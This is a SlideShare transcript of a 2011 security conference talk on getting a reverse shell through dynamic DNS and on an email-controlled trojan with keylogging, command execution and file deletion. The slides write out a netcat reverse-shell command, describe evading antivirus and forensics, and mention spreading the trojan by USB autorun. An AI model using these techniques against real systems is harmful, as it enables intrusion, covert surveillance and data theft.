Handle Explotion of Remote System      Without Being Online !!                 By          Merchant Bhaumik
Who Am I ?• Currently   Helping local law-enforcement And Helping    In Securing Some Government Websites• Developer    Of...
Presentation Flow…….•Reverse Shell Using Dynamic-Dns Concepts• Getting Data From Victim Computer Using Email  Tool
We Will Understand ThisMechanism By Considering    One Scenario……..
Jack’s Situaion……….Jack Working In A Company ...............!In Which All Computers Behind The NATBOX……. ………………………!And He ...
Problems For Jack….•Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections………….•He Don’t Know What IP Addres...
Good Thing For Jack….• Jack’s Office Allow Him To Access His Gmail  Account..N Allow Some OutBound Traffic..
I# INCLUDE< REVERSE SHELL >
Why Reverse Shell ?•Reverse Shell is one of the powerful methodfor Bypassing Network Intrusion DetectionSystems , Firewall...
Diagram 1                                                   192.168.1.1                                                   ...
Diagram 2 (Normal Attack ! )                                                             192.168.1.1                      ...
Normal Flow Of Getting Reverse            Shell                   Exploit !          Attacker Starts Handler         Vuln....
But What’s Wrong With Jack?He Don’t Know What IP Address Is    Allocated To His Computer ( Dynamic IP Allocation By ISPs)
Solution….Attacker Is “Offline” But Still He     Will Get Reverse Shell
My Way…….          Exploit !                               Starting Handler On Local Attacker Starts Handler              ...
Flow Of Execution……       Attacker !        Attack    Exe Running in   Victim Machine                 * If Attacker is not...
Mechanism• If the Code ( First Part ) receives positive Acknowledgement of  sending packets …………  Jack Will Get Reverse Sh...
Dynamic DNS Way…. (Initially ! )• First Part    :   catchme.dyndns-ip.com ( 255.255.255.255 )• Second Part   :   payload.d...
Dynamic DNS Way…. (Finally ! )• First Part    :   catchme.dyndns-ip.com ( 127.0.0.1 )• Second Part   :   payload.dyndns-ip...
Metasploit………….!!!!!•You can embed my method (or My Exe ) with metasploit Payload which is ofyour choice .* The Structure ...
Hands On NetWork                                                    192.168.1.1                                           ...
Time To Enjoy Cooked Cookies And           Recipes !!
Demo
II# INCLUDE <EMAIL TOOL >
Normal Remote Trojans & Viruses !    Attacker                        Victim(Must Be Online !)             (Must Be Online !)
My Tool !!                          Caution:                    No Need To Be Online !!                         Attackers ...
So, How It Works ??                  ZombieAttacker                         Victim
But, Who Is Zombie??@   It may be one of the below :         It is one of like it…….         Or one like this…..         O...
Features !!  Execute Operating System Level Commands By Using Emails !  Get all Network Card Information with Allocated IP...
About It !It is a simple application which Once Up & Going on Victim‟Computer , Attacker can Handle it using Gmail , Yahoo...
Cool Benefits !!If the email account is used by using One of like below then it is totally Anti-Forensic ! No Reverse Dete...
Tool Syntax …..Password_For_Victim “: “Task_Commands”:”                E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password...
Snap Shot 1…(Load Attack Instructions)     Password For Individual VictimSend Account info Of Victim..    Send Drive Info ...
Snap Shot 2…(Get Back Attack Result)                       Attached Info Of Victims Computer…!                            ...
Why Gmail ??
No Fear Of Detection 1      No Direct Connection Between Attacker & VictimAttacker                                        ...
No Fear Of Detection 2No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct ItSelf…….!
How To Spread This Code??Autorun.inf by USB Drives……….Phisical Access Of Victim‟s System…..During Metasploit Explotion ……
Further Possible Development !!This Code Is Flexible Enough To Develop Further By My HackerFriends….It Is Also Possible Fo...
Pros N Cons 1 ! ( Be Transparent !! )Advantages are that the attacker never goin to caught if he/sheusing the browser like...
Pros N Cons 2Disadvantage is that , if the victim has habit of checking thecurrent connections using commands like „netsta...
Hands On Time..!   ( Demo)
For More……backdoor.security@gmail.com
Thanks GuysFor CheckingIt Out …….!
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Upcoming SlideShare
Loading in …5
×

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

1,777 views

Published on

ClubHack 2011 Hacking and Security Conference.
Talk - Handle Explotion of Remote System Without Being Online
Speaker - Merchant Bhaumik

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,777
On SlideShare
0
From Embeds
0
Number of Embeds
174
Actions
Shares
0
Downloads
53
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

  1. 1. Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
  2. 2. Who Am I ?• Currently Helping local law-enforcement And Helping In Securing Some Government Websites• Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection )• Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
  3. 3. Presentation Flow…….•Reverse Shell Using Dynamic-Dns Concepts• Getting Data From Victim Computer Using Email Tool
  4. 4. We Will Understand ThisMechanism By Considering One Scenario……..
  5. 5. Jack’s Situaion……….Jack Working In A Company ...............!In Which All Computers Behind The NATBOX……. ………………………!And He Just Decided To Break One Of TheSystem Of His Office And Getting Shell FromOffice To Home Computer
  6. 6. Problems For Jack….•Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections………….•He Don’t Know What IP Address Is Allocated By His ISP•He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
  7. 7. Good Thing For Jack….• Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
  8. 8. I# INCLUDE< REVERSE SHELL >
  9. 9. Why Reverse Shell ?•Reverse Shell is one of the powerful methodfor Bypassing Network Intrusion DetectionSystems , Firewalls ( Most Of The) etc• Because Some of this network intrusiononly monitors In-bound connection … Notthe Out-bound ……• Jack Has DMZ Network In His Office…..
  10. 10. Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  11. 11. Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4Step I : Start Handleron port 4343nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
  12. 12. Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  13. 13. But What’s Wrong With Jack?He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
  14. 14. Solution….Attacker Is “Offline” But Still He Will Get Reverse Shell
  15. 15. My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional !Vuln. Injection N All that !Victim Sends Reverse Shell For Reverse Shell Scenario !… To Attacker Machine !.. Attacker Wins !
  16. 16. Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
  17. 17. Mechanism• If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell…………….•Else keep running in the victim machine and waits for Ack. From attacker’ machine…
  18. 18. Dynamic DNS Way…. (Initially ! )• First Part : catchme.dyndns-ip.com ( 255.255.255.255 )• Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  19. 19. Dynamic DNS Way…. (Finally ! )• First Part : catchme.dyndns-ip.com ( 127.0.0.1 )• Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  20. 20. Metasploit………….!!!!!•You can embed my method (or My Exe ) with metasploit Payload which is ofyour choice .* The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
  21. 21. Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  22. 22. Time To Enjoy Cooked Cookies And Recipes !!
  23. 23. Demo
  24. 24. II# INCLUDE <EMAIL TOOL >
  25. 25. Normal Remote Trojans & Viruses ! Attacker Victim(Must Be Online !) (Must Be Online !)
  26. 26. My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR ORMAY NOT ONLINE !! MAY NOT ONLINE !!
  27. 27. So, How It Works ?? ZombieAttacker Victim
  28. 28. But, Who Is Zombie??@ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
  29. 29. Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger !This All Stuff With Gmail , Yahoo , Hotmail………!!
  30. 30. About It !It is a simple application which Once Up & Going on Victim‟Computer , Attacker can Handle it using Gmail , Yahoo , HotmailEmail Services…There is no need to be Online for Attacker to attack the VictimSystem…..Attacker Has to send attack instructions to Any of the mailservice & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!”As Victim Connects to the internet …. Attack Launches & theresults are automatically sent back to the Attacker‟s emailAddress…..
  31. 31. Cool Benefits !!If the email account is used by using One of like below then it is totally Anti-Forensic ! No Reverse Detection Is Possible !Create Unique password for all individual victims who areinfected …Ability to handle multiple clients simultaneously …..Delete Files In Victims Computer by Simply Sending An Email..No Antivirus Can Detect Attack Because Of HTTPS ……
  32. 32. Tool Syntax …..Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
  33. 33. Snap Shot 1…(Load Attack Instructions) Password For Individual VictimSend Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
  34. 34. Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
  35. 35. Why Gmail ??
  36. 36. No Fear Of Detection 1 No Direct Connection Between Attacker & VictimAttacker Victim
  37. 37. No Fear Of Detection 2No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct ItSelf…….!
  38. 38. How To Spread This Code??Autorun.inf by USB Drives……….Phisical Access Of Victim‟s System…..During Metasploit Explotion ……
  39. 39. Further Possible Development !!This Code Is Flexible Enough To Develop Further By My HackerFriends….It Is Also Possible For Future To Send Exploits OrTrojans By Using This Code…….Any One Can Send Exploits , Trojans , RootKits , BackDoors BySimply Attaching It With Email And Sending It To His Own AccountOr Account That is Configured In Victim‟ Code………
  40. 40. Pros N Cons 1 ! ( Be Transparent !! )Advantages are that the attacker never goin to caught if he/sheusing the browser like TOR , Anononymizer , VPNs or AnyPROXy…. For accessing the attacking gmail account.No Antivirus can detect the Instruction data because all trafficgonna come from HTTPS …..!Only single email account of gmail goin to use for both the side.Attacker and victim machine both goin to connect same accountbut attacker knows ,But Victim Don‟t !!
  41. 41. Pros N Cons 2Disadvantage is that , if the victim has habit of checking thecurrent connections using commands like „netstat –n‟ thenpossibility to detect Gmail connection when actually there is nobrowser activity. But still it is difficult to detect ………. Becauseprocess is running in Hidden mode….
  42. 42. Hands On Time..! ( Demo)
  43. 43. For More……backdoor.security@gmail.com
  44. 44. Thanks GuysFor CheckingIt Out …….!

×